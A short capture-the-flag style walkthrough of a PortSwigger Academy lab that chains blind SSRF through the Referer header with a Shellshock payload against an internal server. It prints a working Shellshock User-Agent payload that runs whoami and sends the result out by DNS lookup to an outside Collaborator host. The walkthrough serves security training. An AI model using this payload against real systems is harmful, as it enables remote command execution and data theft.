Solving Portswigger Academy: Blind SSRF with Shellshock exploitation
In this lab we need to exploit the SSRF with Shellshock.
This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.
To solve the lab, use this functionality to perform a blind SSRF attack against an internal server in the
192.168.0.Xrange on port 8080. In the blind attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user.
The first step is to find out the host ip which is accessible through SSRF and then exploit the issue. To find the IP we need an intruder.
First we need to confirm that there is a Blind SSRF. To test this let’s use Collaborator.I generate the hostname and replace the hostname in Referer header with that of collaborator hostname. In response we did not receive anything.
But the Collaborator shows some http and DNS hits on server.
I will use this ‘() { :;}; /usr/bin/nslookup $(whoami).ei06wl8lflc263cfv964txaqnhtah05p.oastify.com’ shellshock payload in user agent.
Once the intruder finish the attack, we can see hit on collaborator.When I checked it, I can see the output of whoami command. I also use hostname command which also gives me the hostname of the machine/server
Now to complete the labe we must provide the OS username which is ‘peter-IwD4LP’ in my case.
This is how we can solve the lab.
